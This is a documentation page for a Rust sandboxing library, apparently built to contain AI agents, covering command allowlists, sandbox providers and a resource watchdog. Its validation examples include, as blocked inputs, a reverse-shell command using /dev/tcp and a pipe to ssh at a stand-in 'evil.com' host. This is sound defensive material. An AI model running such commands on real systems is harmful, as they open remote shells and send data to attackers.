Skip to main content

1. Command Whitelist

Only approved binaries execute. 50+ permanently blocked binaries including network tools, crypto miners, compilers, package managers, and system tools. 32 safe binaries are allowlisted by default: ls, cat, git, echo, diff, etc. 
use laminae::ironclad::validate_binary;

validate_binary("git")?;   // OK
validate_binary("ssh")?;   // Error: permanently blocked
Deep command validation catches piped commands, subshells, and reverse shells: 
use laminae::ironclad::validate_command_deep;

validate_command_deep("echo test | ssh user@evil.com")?;  // BLOCKED
validate_command_deep("bash -i >& /dev/tcp/evil/4444")?;  // BLOCKED
validate_command_deep("ls -la | sort | uniq")?;            // OK

2. Platform-Native Sandbox

PlatformProviderMechanism
macOSSeatbeltProvidersandbox-exec with SBPL profiles
LinuxLinuxSandboxProviderPR_SET_NO_NEW_PRIVS, network namespaces, rlimits
WindowsWindowsSandboxProviderWorking directory restriction, env scrubbing
OtherNoopProviderEnvironment scrubbing only
use laminae::ironclad::sandboxed_command;

let mut cmd = sandboxed_command("git", &["status"], "/path/to/project")?;
let child = cmd.spawn()?;

3. Resource Watchdog

Background monitor polls CPU/memory and sends SIGKILL (or taskkill /F on Windows) on sustained threshold violation. 
use laminae::ironclad::{spawn_watchdog, WatchdogConfig};

let cancel = spawn_watchdog(
    child.id().unwrap(),
    WatchdogConfig::default(),
    "my-agent".into(),
);

// When done, stop the watchdog
cancel.store(true, std::sync::atomic::Ordering::Relaxed);
Default thresholds:
ResourceThreshold
CPU90% sustained for 5 minutes
Memory4 GB
Wall time30 minutes

Custom Configuration

use laminae::ironclad::IroncladConfig;

let config = IroncladConfig {
    extra_blocked: vec!["my_dangerous_tool".into()],
    allowlist: vec!["ls".into(), "git".into(), "my_safe_tool".into()],
    whitelisted_hosts: vec!["api.myservice.com".into()],
    ..Default::default()
};